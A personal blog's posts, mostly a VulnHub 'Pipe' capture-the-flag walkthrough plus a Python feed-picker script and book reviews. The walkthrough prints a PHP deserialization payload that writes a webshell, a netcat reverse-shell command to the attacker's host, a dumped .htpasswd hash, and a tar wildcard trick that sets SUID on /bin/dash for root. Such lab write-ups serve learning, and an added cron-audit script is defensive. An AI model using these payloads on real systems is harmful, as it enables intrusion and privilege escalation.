I Built Something – Pick a VM.py

After that last post I got thinking to myself that an automated, random picker would be a simple project, and fun. I figured it’s probably fairly straightforward to run a site-specific google search against VulnHub, pull the download link for a VM, then dump it to a text file. That idea didn’t pan out at all really, but I did get the script built.

Turns out, you need API access to google for running scripts against it. Fair enough, this was a hobby project, so my intended usage was low enough that it was firmly in the free tier. I started looking at putting this together while poking around VulnHub in another tab. I found the RSS links. I’ve not done any API interaction, but I do know that one of python’s strengths is text manipulation. Pivot #1.

So how hard is it to pull a text file, with a very specific format, and dump the content to an array? Not hard at all. The feedparser module pulls this information into an array natively when provided a URL. Easy enough. Except it never loaded. I tested all my ideas in the interpreter, and the URL I used, https://www.vulnhub.com/feeds/added/atom/, never seemed to load the variable like all the demos I was seeing. I tried other feeds, same result. Before I looked up anything about feedparser and https, I gave it one shot with http, since none of the samples I found were using it. Bingo. All is well. Er, maybe not. I had previously determined the only way to get a random entry is to feed some random function a start and end value, then pull a random number. The end value would be the length of the array we just built. Except that when I tried to check that, I found a short list.

Now, the homepage of VulnHub.com shows there are 13 pages of at least 3 VMs. That math didn’t work. So I checked the other feeds, and bingo again, the torrent link, http://www.vulnhub.com/feeds/torrent/atom/, has the information I want.

[screenshot: feeds_torrent_len]

So now I know I have what I need, just need to do a little math.

[screenshot: math_vm]

The next bit is pretty straightforward, revert that index value back into the actual data from the array.

print vh_feed['entries'][vm_pick]['title']

Well then. That’s all nice and fuzzy. Since we’re using this to look at torrents, couldn’t we just pull down the torrent file to our local watched folder? Logically it didn’t seem that hard. wget works just fine in the terminal, there must be Python stuff for this.

Absolutely.

from os import path
from urllib import urlretrieve   # Python 2, as in the original script
from urlparse import urlsplit

pick_url = vh_feed['entries'][vm_pick]['link']

# keep only the last path component of the URL as the local file name
vm_pick_filename = path.basename(urlsplit(pick_url).path)
vm_pick_filename = "/Users/username/Downloads/" + vm_pick_filename

print vm_pick_filename

# if block to avoid overwriting an existing file of the same name
if not path.isfile(vm_pick_filename):
    urlretrieve(pick_url, vm_pick_filename)
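The same flow as one Python 3 script, written here as an added example rather than the post’s or the pick-a-vm.py code: it parses an Atom feed with the standard library instead of feedparser, picks a random entry, names the file after the URL’s last path component only, and skips the download when the file already exists. The feed, the example.invalid links and the fetch stand-in are constructed so it runs offline.

```python
import os
import random
import tempfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed sample in the shape of an Atom feed such as
# http://www.vulnhub.com/feeds/torrent/atom/ (the real one has far more entries).
SAMPLE_FEED = """<feed xmlns="http://www.w3.org/2005/Atom">
  <title>constructed torrent feed</title>
  <entry>
    <title>Pipe: 1</title>
    <link href="http://example.invalid/torrents/pipe.torrent" rel="alternate"/>
  </entry>
  <entry>
    <title>Sample: 2</title>
    <link href="http://example.invalid/torrents/sample2.torrent"/>
  </entry>
  <entry>
    <title>Broken entry</title>
    <link href="http://example.invalid/torrents/"/>
  </entry>
</feed>
"""
ATOM = {"a": "http://www.w3.org/2005/Atom"}


def parse_entries(feed_xml):
    """Return [(title, link)] for each <entry>, the same shape as
    feedparser's feed['entries'][i]['title'] / ['link'] in the post."""
    root = ET.fromstring(feed_xml)
    entries = []
    for entry in root.findall("a:entry", ATOM):
        title = entry.findtext("a:title", default="", namespaces=ATOM)
        link = entry.find("a:link", ATOM)
        if link is not None and link.get("href"):
            entries.append((title, link.get("href")))
    return entries


def pick_entry(entries, randrange=random.randrange):
    """The 'little math' from the post: a random index in [0, len(entries)).
    An empty list is the symptom of having fetched the wrong (short) feed."""
    if not entries:
        raise ValueError("feed has no entries; check the feed URL")
    return entries[randrange(len(entries))]


def local_filename(url, download_dir):
    """Name the download after the last path component of the URL only.
    Returns None when that gives an empty or hidden name, so a feed entry
    can never choose a path outside download_dir."""
    name = os.path.basename(urlsplit(url).path)
    if not name or name.startswith("."):
        return None
    return os.path.join(download_dir, name)


def save_pick(entries, download_dir, fetch, randrange=random.randrange):
    """Pick an entry and write it only if no file of that name exists yet.
    fetch(url) -> bytes is injected so this runs offline.
    Returns (title, path, wrote)."""
    title, url = pick_entry(entries, randrange)
    target = local_filename(url, download_dir)
    if target is None:
        raise ValueError("refusing to save %r: unusable file name" % url)
    if os.path.isfile(target):
        return title, target, False          # the post's overwrite guard
    with open(target, "wb") as fh:
        fh.write(fetch(url))
    return title, target, True


def demo(randrange=lambda n: 0):
    """Run the flow twice into a fresh temp dir: the first call writes the
    file, the second finds it and skips. Returns (name, wrote1, wrote2, same)."""
    entries = parse_entries(SAMPLE_FEED)

    def fetch(url):
        return b"d8:announce0:e"           # constructed stand-in for torrent bytes

    with tempfile.TemporaryDirectory() as tmp:
        _, path1, wrote1 = save_pick(entries, tmp, fetch, randrange)
        _, path2, wrote2 = save_pick(entries, tmp, fetch, randrange)
        return os.path.basename(path1), wrote1, wrote2, path1 == path2


if __name__ == "__main__":
    print(demo())
```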

That’s it. It may not look like much, but it’s got it where it counts. As an exercise, I’m sure I’ll learn more so that I can improve it later. If you want to grab it for any reason, feel free.

https://github.com/wea53L/python-utilities/blob/master/pick-a-vm.py


VulnHub Pipe Walkthrough

How do you get to be a pentester? Practice.

Pipe is a VM created by Sagi. I made a new commitment to myself to start working through these and writing them up, and this is my first example. My solution below is not unique, it is an amalgamation of techniques I grabbed reading the walkthroughs linked on VulnHub.com.

Step 0 : Get it running
I used VirtualBox for this because it’s what I had handy. The VM comes as an OVA, so loading it in VirtualBox is simple, just File -> Import. Networking can be confusing if you’re not practiced with hypervisors, in my case I chose to create a Host-only network (VirtualBox -> Preferences -> Network -> Host-only networks), checked the IP range and that DHCP was turned on. After import, you want to verify the network adapter settings of the VM and start it. In my case I did it headless. I have no need to interact with the console, and since 5.0 VirtualBox has had the option in the GUI to start headless.

Step 1 : Discovery/Enumeration
The default option here is nmap. That’s where I ended up. First I thought to try the idea I read in this tweet, however, that’s for Windows, and I am on a Mac, and I’d rather do the practice attacking than translating cmd to bash. This means the fallback is for me to start googling the parameters I can never seem to remember.

$ nmap -sP 192.168.56.0/24

Wicked, host found at 192.168.56.101. Moving right along, what’s it running? Again, more googling for nmap parameters.

$ nmap -sV 192.168.56.101
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-03 17:30 EST
Nmap scan report for 192.168.56.101
Host is up (0.0046s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
80/tcp  open  http    Apache httpd
111/tcp open  rpcbind 2-4 (RPC #100000)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Hooray! Open ports! Easy to investigate open ports, like 80. Pointing a browser at it is a little disheartening at first. All you get is a login dialog.

[screenshot: pipe1]

All my reading on other people’s hard work leads me to believe that tampering with HTTP verbs will help. I pointed the browser at a localhost proxy on 8080 and fired up BurpSuite. I tried every verb I know about (or could read about on Wikipedia) without much result. I did see a 405 error, which I can’t remember having seen before. To get these results I captured a GET request and sent it to Burp’s Repeater tab, then just altered the verb each time.

GET 401 
HEAD ok 
TRACE unallowed 405 
POST 401 
PUT 401 
OPTIONS 401 
DELETE 401

So moving right back to my handy cheatsheets, I found you just need to send an invalid verb. In my case I chose BOB. Again I met a snag. The base "/" request didn’t work. Instead of running back to the answers, I looked at the evidence I had. Slash was redirecting to index.php. Trying http://192.168.56.101/index.php still got me the login box, but if I repeated that request with my friend BOB, I got a result! I sent that back to the browser to further investigate.

Clicking the only link on the page, watching in Burp, I see the following parameter

[screenshot: param]

Seems like a great spot to start injecting things, but what? I threw it over to the decoder tab, but that didn’t really clear anything up for me. 

[screenshot: decode]

Back to the cheatsheets. The source of index.php has a fun source for its JavaScript.

[screenshot: script_source]

Oh look, an accessible directory!

[screenshot: sciptz]

Reading the files didn’t personally give me any insight into what’s happening, which really shows I need to work on my code reading skills. This means back to the cheatsheets, for the wisdom of folks much more experienced than I.

Rolling back a step, that parameter feeds php.js, which has access to write to the filesystem, which is BAD. If you feed it some sample ideas, like so,

O:3:"Log":2:{s:8:"filename";s:28:"/var/www/html/scriptz/me.txt";s:4:"data";s:11:"howdy%20rowdy";}

you get a result like this,

[screenshot: me.text]

OOOOOO, the power, I can feel it. Oh… I can feel it.

Step 2: Exploitation
Using a new parameter,

O:3:"Log":2:{s:8:"filename";s:29:"/var/www/html/scriptz/me5.php";s:4:"data";s:41:"<?php%20$cmd%3d$_GET['cmd'];%20system($cmd);%20?>";}

Teaches me all about webshells. And that I need to install something listening on my attacker computer. Homebrew to the rescue.

# from attacker machine
$ brew install netcat
…magic…
$ nc -l 8888

Time to do the real hacker stuff. Hit this link with Firefox, and watch the magic of vulnerable web servers.

http://192.168.56.101/scripts/me5.php?cmd=nc 192.168.56.1 -e /bin/bash

Here’s what I saw and did to check myself when the connection came back.

Connection from 192.168.56.101:57650
ls -la
total 28
drwxr-xr-x 2 www-data www-data 4096 Feb  4 07:30 .
drwxr-xr-x 4 www-data www-data 4096 Jul  9  2015 ..
-rw-r--r-- 1 www-data www-data   94 Jul  9  2015 .htaccess
-rw-r--r-- 1 www-data www-data  474 Jul  6  2015 log.php.BAK
-rw-r--r-- 1 www-data www-data   11 Feb  4 07:15 me.txt
-rw-r--r-- 1 www-data www-data   41 Feb  4 07:30 me5.php
-rw-r--r-- 1 www-data www-data 3768 Jul  5  2015 php.js
whoami
www-data

Full disclosure, as a newb, I’ve done nearly nothing with remote shells in this capacity, and the lack of prompt threw me off. I accidentally killed the connection more than a few times following my example mentors. Reconnecting is as easy as hitting the up arrow in Terminal to restart the listener, then refreshing the link in Firefox to restart the connection. So what do we know now? We’re interacting with the vulnerable machine as the user www-data. What can we do? Plenty, as it turns out. Privilege escalation is the only logical solution. So I poked around looking for info in the few files I found.

cat /scriptz/.htaccess
IndexIgnore .htaccess
Satisfy any
<Files ".htaccess">
order allow,deny
deny from all

cd ../
cat .htaccess
AuthUserFile /var/www/html/.htpasswd
AuthName "index.php"
AuthType Basic

require valid-user

cat .htpasswd
rene:$apr1$wfYjXf4U$0ZZ.qhGGrtkOxvKr5WFqX/

/scriptz/.htaccess had nothing interesting. Moved up a directory, and .htaccess points to .htpasswd. .htpasswd has … A USER! W00t. Now what can our new best friend rene do? Start by looking to see if they have anything interesting.

ls -la /home/rene
total 24
drwxr-xr-x 3 rene rene 4096 Jul  6  2015 .
drwxr-xr-x 3 root root 4096 Jul  5  2015 ..
-rw-r--r-- 1 rene rene  220 Jul  5  2015 .bash_logout
-rw-r--r-- 1 rene rene 3515 Jul  5  2015 .bashrc
-rw-r--r-- 1 rene rene  675 Jul  5  2015 .profile
drwxrwxrwx 2 rene rene 4096 Feb 11 07:01 backup

ls -la /home/rene/backup
total 104
drwxrwxrwx 2 rene rene  4096 Feb 11 07:03 .
drwxr-xr-x 3 rene rene  4096 Jul  6  2015 ..
-rw-r--r-- 1 rene rene 64477 Feb 11 07:00 backup.tar.gz
-rw-r--r-- 1 rene rene 15757 Feb 11 07:02 sys-13457.BAK
-rw-r--r-- 1 rene rene 11472 Feb 11 07:01 sys-2789.BAK
-rw-r--r-- 1 rene rene   539 Feb 11 07:03 sys-3978.BAK

That’s pretty interesting. Something is writing files. Actively. Cron is a handy tool for automated things. Wonder what it has to say for itself.

cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /root/create_backup.sh
*/5 * * * * root /usr/bin/compress.sh

Again my inexperience is a detriment. The last time I looked at a crontab file was 5 years ago. The last two lines did stick out to me as something interesting. I can’t access /root as www-data. Can I read /usr/bin? Yup.

cat /usr/bin/compress.sh
#!/bin/sh

rm -f /home/rene/backup/backup.tar.gz
cd /home/rene/backup
tar cfz /home/rene/backup/backup.tar.gz *
chown rene:rene /home/rene/backup/backup.tar.gz
rm -f /home/rene/backup/*.BAK

Leaning on my mentors yet again, there is a vulnerability in the configuration. Distilled to the least number of characters, there’s a vulnerability in the tar command as entered. I had to read up on this, since even after following the demo, I didn’t understand how my actions had worked. Here’s the relevant explainer,

Simple trick behind this technique is that when using shell wildcards, especially asterisk (*), Unix shell will interpret files beginning with hyphen(-) character as command line arguments to executed command/program. That leaves space for variation of classic channeling attack. Channeling problem will arise when different kind of information channels are combined into single channel. Practical case in form of particularly this technique is combining arguments and filenames, as different “channels” into single, because of using shell wildcards.

Leon Juranic
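Turning that explanation into a defender’s check, as an added example that is not part of the walkthrough or its sources: it parses the crontab and compress.sh shown above (embedded here as constructed input) and reports a root cron job that expands a bare glob in a directory other users can write to. Reading directory permissions from an ls-style mode string instead of os.stat() is an assumption made so it runs offline.

```python
import shlex

# Constructed input: the system crontab and the script it runs, as shown in
# the walkthrough above (comment lines trimmed).
CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root    cd / && run-parts --report /etc/cron.hourly
* * * * * root /root/create_backup.sh
*/5 * * * * root /usr/bin/compress.sh
"""

SCRIPTS = {
    "/usr/bin/compress.sh": """\
#!/bin/sh
rm -f /home/rene/backup/backup.tar.gz
cd /home/rene/backup
tar cfz /home/rene/backup/backup.tar.gz *
chown rene:rene /home/rene/backup/backup.tar.gz
rm -f /home/rene/backup/*.BAK
""",
}

# Directory modes as "ls -la" permission strings, taken from the listing above
# (a real audit would os.stat() the path instead).
DIR_PERMS = {"/home/rene/backup": "drwxrwxrwx"}

# Programs whose options can be smuggled in through a filename starting with
# '-'. Any program is affected in principle; these are the usual suspects.
GLOB_SENSITIVE = {"tar", "rsync", "chown", "chmod", "rm", "cp", "mv"}


def root_cron_jobs(crontab_text):
    """Return (schedule, command) for each /etc/crontab line that runs as root."""
    jobs = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        # SHELL=... / PATH=... assignments and short lines are not jobs.
        if len(fields) < 7 or "=" in fields[0]:
            continue
        if fields[5] == "root":
            jobs.append((" ".join(fields[:5]), fields[6]))
    return jobs


def bare_wildcard_lines(script_text):
    """Find commands that pass an unquoted relative glob to a glob-sensitive
    program without a '--' end-of-options marker. In a directory holding a
    file named '--checkpoint=1', such a glob hands tar that option."""
    findings = []
    cwd = None
    for lineno, raw in enumerate(script_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            argv = shlex.split(line)
        except ValueError:
            continue  # unbalanced quotes: nothing we can reason about
        if not argv:
            continue
        if argv[0] == "cd" and len(argv) > 1:
            cwd = argv[1]  # remember where later globs will be expanded
            continue
        if argv[0] not in GLOB_SENSITIVE or "--" in argv:
            continue
        for arg in argv[1:]:
            # '*' can expand to names starting with '-'; '/path/*' and './*'
            # always expand to names starting with '/' or './', which is safe.
            if "*" in arg and not arg.startswith(("/", "./")):
                findings.append({"line": lineno, "command": line, "cwd": cwd})
                break
    return findings


def world_writable(perm_string):
    """True if an ls-style mode string (e.g. 'drwxrwxrwx') grants write to others."""
    return len(perm_string) == 10 and perm_string[8] == "w"


def audit(crontab_text, scripts, dir_perms):
    """Cross-reference root cron jobs with their scripts: a root job expanding a
    bare glob inside a directory other users can write to is the Pipe bug."""
    report = []
    for schedule, command in root_cron_jobs(crontab_text):
        script = command.split()[0]
        if script not in scripts:
            continue  # e.g. /root/create_backup.sh, which www-data cannot read
        for finding in bare_wildcard_lines(scripts[script]):
            cwd = finding["cwd"]
            report.append({
                "schedule": schedule,
                "script": script,
                "line": finding["line"],
                "command": finding["command"],
                "cwd": cwd,
                "cwd_world_writable": world_writable(dir_perms.get(cwd, "")),
            })
    return report


if __name__ == "__main__":
    for item in audit(CRONTAB, SCRIPTS, DIR_PERMS):
        print(item)
```

Either fix closes the finding: end the option list with `--` (or use `./*`) so filenames are never parsed as options, and stop letting a root job work inside a directory that is writable by other users.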

With that in mind, the exploit below makes much more sense. First I verified I was where I needed to be on the vulnerable machine.

pwd
/var/www/html/scriptz
cd /home/rene/backup
pwd
/home/rene/backup

Assumptions verified, I followed the example of my favorite anonymous mentor, @g0blinResearch. I’m inserting files named as commands, which in turn are telling the vulnerable string in /usr/bin/compress.sh to create shell.sh (as root b/c of cron) and that it should change the SUID bit on /bin/dash. This means that as /bin/dash is called from any user, it will be running as root. I may be articulating this poorly, but if you follow the commands below, you see I get root.

echo > --checkpoint=1;
echo > --checkpoint-action=exec=sh\ shell.sh;
echo 'chmod u+s /bin/dash' > shell.sh
chmod +x shell.sh

This is our exploit, creating three files, and changing shell.sh to be executable. Below I’m verifying this worked as intended.

ls -la
total 164
-rw-r--r-- 1 www-data www-data 1 Feb 11 07:12 --checkpoint-action=exec=sh shell.sh
-rw-r--r-- 1 www-data www-data 1 Feb 11 07:12 --checkpoint=1
drwxrwxrwx 2 rene rene 4096 Feb 11 07:13 .
drwxr-xr-x 3 rene rene 4096 Jul 6 2015 ..
-rw-r--r-- 1 rene rene 90755 Feb 11 07:10 backup.tar.gz
-rwxr-xr-x 1 www-data www-data 20 Feb 11 07:13 shell.sh
-rw-r--r-- 1 rene rene 25883 Feb 11 07:12 sys-2531.BAK
-rw-r--r-- 1 rene rene 465 Feb 11 07:13 sys-26349.BAK
-rw-r--r-- 1 rene rene 20350 Feb 11 07:11 sys-8054.BAK

Waiting for the next loop of cron to run, I go and get a cup of coffee and check back by running /bin/dash.

/bin/dash
whoami
root

#w00t

I guess that’s the root part of boot2root, huh? Well then. Let’s just finish this quickly to get moved on to the next.

cd /root

ls
create_backup.sh
flag.txt
cat flag.txt
[ASCII-art banner from flag.txt omitted]
Well Done!
Here's your flag: 0089cd4f9ae79402cdd4e7b8931892b7

And that’s all. I learned a ton. Hopefully as I do more of these there will be less leaning on the hard work of others, and more “hacker intuition”. In the meantime, this blog post is brought to you by the fine walkthroughs below,

https://research.g0blin.co.uk/devrandom-pipe-vulnhub-writeup/
http://rastamouse.me/blog/2015/pipe/
http://oldsmokingjoe.blogspot.sg/2015/12/dfdf-setsharsethernetpara.html

and the lovely folks at vulnhub.com. If you’re interested in this stuff, I highly recommend you pull down some of their VMs and try it yourself. It’s not that hard, it is that fun, and there’s a lot to learn!

Since I’m done, it’s time to turn off the lights on my way out of the VM, since I’m root and all.

shutdown -h now

Books 2015 61-7976

I grew up idolizing pilots, particularly fighter pilots, and with them the space program. I have a very clear memory of visiting the JPL when I was five or six years old. Someone there was giving my dad a tour and I was able to tag along. Other cool places I learned about flight were airshows. It was always a big deal to go see the Blue Angels when they were nearby. I think part of it was Navy pride, and part of it was my dad’s memory of living at NAS Pensacola, the winter home of the Angels. I was born in Pensacola, but the only memories I have of it were vacations there later in life.

We moved to Ohio in 1989, and the absolute best part of it was moving minutes away from the United States Air Force Museum. 3 hangars FULL of airplanes, spacecraft, and all the associated memorabilia, videos, stickers, models, dioramas and displays. A few years later I remember staying home from school to go sit on a hill and watch one of the last Blackbirds fly in. 61-7976 is the tail number, and I’ll never forget the feeling. Even from a mile or more away, the sound shook you. This is an aircraft that cruised with the afterburners on. It flew at three times the speed of sound. I still cannot believe I was lucky enough to see one in the air.

Over the weekend I was stuck at a car dealership, as one gets sometimes when you need necessary repairs on short notice. Bored, and looking for something to pass time that wouldn’t drain all my batteries, I found Sled Driver: Flying the World’s Fastest Jet on my hard drive. I’m not sure where I acquired it, but it was great timing. This book chronicles the section of its author’s career driving the “Sled”, the “Habu”, the “Blackbird”, the SR-71. The author recounts every step, from volunteering, interviewing, training, and finally flying the fastest airplane built by humankind. I’ve always known about the machine scientifically, it’s fast. Really Fast. It leaks fuel on the ground, because its skin was designed to expand under the friction of the air as it cruised at two or three times the speed of sound. This book tells you the human elements. How stressful it is to understand that you cannot make mistakes. Every mission the pilot holds the life of himself and his RSO (Reconnaissance Systems Officer) in his hands. I think the author wisely avoids much discussion of the actual missions, but instead focuses on relating what it’s like to sit in that cockpit, hurtling forward faster than a rifle bullet. For four years, that was this man’s day job. I’ve had a couple of jobs in life, but I don’t think I’ll ever do something like that.

I was born at a time when America was just getting comfortable with the idea of going into space. We had been to the moon, and the Space Shuttle was just really getting her start. At the same time the Cold War was raging, so the military and NASA got all the money they could ask for. Since then the Cold War has ended, and NASA feels forgotten to a kid that grew up drawing of space as something both science fiction and science fact. You can debate the politics of the situation all day long, but the SR-71 was a monument to human achievement. It was designed, planned, tested, built, and put into production (they built thirty two of those crazy machines) at a time when computers were not a commodity device. I’ve had access to more computing power for almost my entire life than the entire project team designing the fastest airplane ever built. Reading this book makes me hope that the legacy of my generation can hopefully come up with some achievement more meaningful than another version of Flappy Bird, or another slick source code version control system.

Books 2015 IWT

Today’s summary is about “I Will Teach You To Be Rich” by Ramit Sethi. Despite what sounds like a sleazy title, I will count this book among the best I’ve ever read in terms of actionable content, written for YOU to get results. Yes, I’m sure that Ramit is very happy people like and buy his book, but from the first page to the last, he is encouraging the reader to look beyond their current state, and to get better.

This book isn’t about how to earn sick piles of cash to sleep on. Its most basic message is that you can make your money work for you, so that you are able to enjoy a rich life. How you define a rich life is your own journey. Ramit believes, and I with him, that worrying about which bill is paid when, which account to use for what, and managing your finances down to every tenth of a cent is in no way a rich life. Money is important, and having increasing amounts of it is not a bad goal. This book is super cheap and if you’re really that broke, half its content is available from Ramit himself in many places online. However, it’s worth a buy. This is the second book I’ve purchased as an adult for another person. It’s the first book I’ve done that after reading. It won’t be the last.

Ramit doesn’t bullshit you. Learning to deal with money takes work. Unlearning or changing bad or outdated habits is hard. I’m just starting my journey following his ideas to automate my finances and the rewards are dramatic. They’re also a lot of work. Don’t be lazy. Try harder.

My fancy pen

This post is a follow-up. I spent a month trying to determine if this would work, and finally just threw money at the problem. I did get lucky though.

I have a lovely pen, a Muji fountain pen. This ticks all the little things I desire most in a quality writing implement. It’s a cylinder from top to bottom, it has a snap cap rather than screw on, and it takes cartridges, to keep me from spending obscene amounts of time and money dorking with ink.

Once I bought one, I found out this pen ships with a “fine” nib.
[photo: finenib]

In practice, with my handwriting and notebooks, this is not ok. I found a fair number of forum and blog posts where people discuss changing nibs, but there’s very little resolution. So I did some learning, and it looks like a #5 nib should be a drop-in replacement. The fine folks at Goulet Pens happen to sell a #5 Edison Extra Fine. More searching blogs and forums say it should work. $20 and a couple days later, I can confirm. My cheap pen ended up costing me around forty bucks, plus ink, but I’m damn happy about the result.

[photo: final]

Books 2015 Part 1

The intention of this post was to be an annual reflection of my reading habits. Since I’ve kept at it for seven months, I’m not going to delay it until 2016, I’ll just drop monthly updates whenever I work my way through a book or two.

January 2015

I started re-reading Shadowrun novels after trying to plan a blog post relating my Macbook to a cyberdeck in this universe. I got sucked in because they’re entertaining. I haven’t read many of these since early college, and it is fascinating to see what predictions about the future they totally missed. Fax machines are still a thing in this universe. And payphones, called telecoms, but the principle is the same.

Streets of Blood

Nosferatu

Striper Assassin

February 2015

Just a single entry, because Neal Stephenson writes books that are forever long. Snow Crash is the next book out of people’s mouths after Neuromancer. I’ve read most of William Gibson’s cyberpunk stuff, so I decided it was time to give this one a shot. It’s got some great stuff in it, but is way too long to develop what really was a fairly simple story. I think I’ll be avoiding Neal Stephenson for a while. I still love Cryptonomicon, but I was pretty unhappy at the end of reading this book, despite the utterly badass notion of a hacker with swords that wrote a sword-fighting engine to match his reality.

Snow Crash

March 2015

March is nonfiction month. I’ve spent two months this year reading fiction, so now it’s time to get on track with something else. I’ve got a backlog of want and need to read stuff. I don’t really have any goal except to read new books rather than re-read old books, and for them to be non-fiction. However, they’re obviously closely matched to my interests, one has Macintosh in the title.

The Macintosh Way Picked this up when Guy put these out for free. I am nostalgic about Classic Mac stuff, probably because it was my first exposure to computing. I’ve read folklore.org on and off for almost ten years. Now that I have experience watching and interacting with the management of a fair sized corporation, these sorts of books are a lot more interesting. — After finishing the book it’s very funny to compare 1990 Apple to 2015 Apple. There’s a lot that they didn’t do or believe in then that is a staple of their business now, mostly retail and hands on support. There are many other things that stand out as exactly the same, namely they want developers to create fantastic Mac and iOS applications. Apple does not want ports from other operating systems, they don’t want good enough, they want their platform to run the best software.

Lauren Ipsum I think I saw this on one too many infosec slides and needed a short break to something completely different. It’s borderline non-fiction. There’s a little girl lost in a strange world, which turns out to directly map to computing concepts. It’s kind of like Tron meets Through the Looking Glass. It’s not a bad story, it just feels exaggerated for the effect of the metaphor. I probably will not be reading this again.

April 2015

Continuing non-fiction, I started with Creativity, Inc. Mostly because I bought a copy for my Dad and I know he will want to discuss it. Well, that and Ed Catmull and Pixar have proven to be one of the most clever groups to deal with people.

May 2015

Finally finished Creativity, Inc. To crudely sum it up, the entire book focuses on intrinsic honesty. Pixar’s success is based on the fact that anyone can tell anyone anything, no repercussions. Catmull presents this in different ways, talking about his own history, John Lasseter and the other film directors, and of course Steve Jobs. They all have a different way of looking at it and phrasing it, but honesty is what drives their professions and the company they work for. It’s impressive to read about a company that both says they work for that kind of honesty, then shows it. Catmull describes many painful moments when they needed the honesty to make the films work. He also talks about “Notes Day”, when they turned to the company at large to help them become more effective. This struck me because he describes the thoughts leading up to it, its execution, and its follow-through. I’ve never seen something like that executed on that scale by an organization so … honestly.

June 2015

Busy month, nothing to report here other than I’ve pledged to myself that I need to read more books I’ve never read before. I spent a fair bit of time thinking about it and realized I’ve been reading the same couple of dozen books every few years for roughly twenty years. No more. I’ll need a break eventually, but for now I need to stop reading pulp sci-fi and horror books. I need to spend more time reading different things. For now that’s all pretty technical non-fiction, but we’ll see where this path ends.

July 2015

June was weird and as such I didn’t actually finish things. I slowly moved through this, Dissecting the Hack: The F0rb1dd3n Network, Revised Edition, at home and WOW is all I can think to say. If you ever know anyone interested in the nuts and bolts of infosec, this is the book for them. It’s got a cheesy narrative story in the first half of the book, which feels like a true-to-life adaptation of the movie Hackers. However the second half is astoundingly verbose, contextualizing every bit of jargon, in-joke, or techy thing that happens in the story. After reading this I feel like if I had read this two years ago, I would be in a very different position in my life. This book compiles all the things that I’ve picked up from blog posts, con talks, conversations, twitter, and every other source that has helped me learn about infosec. Totally worth the time for anyone that considers themselves new to the industry, or anyone willing to learn a little bit more.

At work I’m also trying to branch out, but this time with a lot less success than my home book. Metasploit, The Penetration Tester’s Guide felt like a misguided mess. The book opens with a quick once over through Metasploit features, where and why to use them, but left me with lots of “how?” questions. The most glaring example is database use. The book guides you through using nmap directly in Metasploit, storing the results in a database, and then . . . nothing. That’s the last reference to the database that I saw. WHY would you store all your scan results, then not use them as a variable in every module for the rest of the book?! That failure definitely biased me through the rest of the book, because for every example I’m asking, “Why the HELL am I typing RHOST again?!”. Another sin that bugged me, but honestly is not the author’s fault, is that two thirds of the exploit examples are based on Windows XP SP2. In 2010, when the book was published, that wasn’t that big of a deal to find. Now? In 2015? I’ve got access to a software testing library, and we don’t keep those laying around. I blame this on the editorial staff not being technically foresighted enough. There are plenty of intentionally vulnerable Linux distros that could have stood in for Windows. Enough ranting. If you’re reading this and interested in Metasploit, read the Offensive Security version of this book, Metasploit Unleashed.

Be Humble

I was lucky enough to get selected again to speak at the local BSides this year. It was a fantastic experience, better than last year. I got a lot of good feedback and discussion from my talk, entitled, “DIY Hacker Training, a Walkthrough”. I just went through the things that I use for learning resources and keeping track of news around the infosec community.

The second keynote of the day was … unexpected. Chris Nickerson is typically the first person people point to when the topic of “rockstar” in the community is raised. He tells funny stories, he’s often seen with a drink in hand, and he’s always talking about this time he got into some shit. Saturday Chris got up and put his story out there for everyone to see, as a lesson, almost a confession, and a pledge to get better. He talked about the highs of leading in the infosec community for 20 years, attaining that “rockstar” status; TV shows, board positions, leading companies, owning companies, pwning companies. He also talked about the hard parts, the rough patches, the terrorizing that he and his loved ones are enduring every day. It’s a hard lesson to learn and I’m sure an even harder one to teach. I am grateful for the lesson and for Chris’ sacrifice. He has taught me more than a few things over the last few years as I have grown up into this field. The message I got from him a while ago, that he underscored again on Saturday, is universal. No one can claim to live a full life without it and absolutely no one can have a decent career without it. Be humble. Don’t be cocky. Everyone, no matter how smart, no matter how dumb, no matter where they’re coming from, everyone knows something you don’t, and can teach you things.

It’s often said that the key to succeeding in Information Security is mindset. You have to think like an attacker, think about what it can do, rather than what it should do. Since the first time I heard Chris say this in a talk, I’ve watched him and others in the community live it at cons, on twitter, in their blogs. Everyone can help you get better. As they can help you, so can you help them. Share your insights, share your experience, share your knowledge. There’s not a better message to take home.

Be Humble.

Wow. Just, Wow.

Since Windows 7 announced or demoed their Aero-Snap feature, I’ve wanted it for OS X. I find it extremely handy to be able to just throw a window towards an edge of a screen and have it conform to a size by default. Two windows side-by-side are incredibly useful for learning things in a terminal or IDE with a browser right next to it. I’ve been wishing for something, particularly since I got my Macbook 11. Better Touch Tool is that thing. And it’s FREE.

I found it because someone posted some jab at the dev for running out of version numbers on Twitter, which prompted me to check out the reddit thread, and I finally downloaded the tool. AND THE FIRST THING IT ASKED ME ON THE FIRST LAUNCH WAS TO ENABLE WINDOW SNAP. Done. Winner. Over in one round. As long as this tool keeps working it’ll be on my macs.

Update, 06.24.2015 – Doesn’t Apple finally announce this feature for OS X this fall? sumbitch. If you have an *extra* mac, I recommend the betas.

I Built Something – VBox Lab PS

I’ve dabbled in programming of one sort or another since I learned BASIC in 4th grade. Finally I’m starting to envision products I need small enough to get my feet wet. There will be at least one more of these, once I figure out some intricacies of Objective-C.

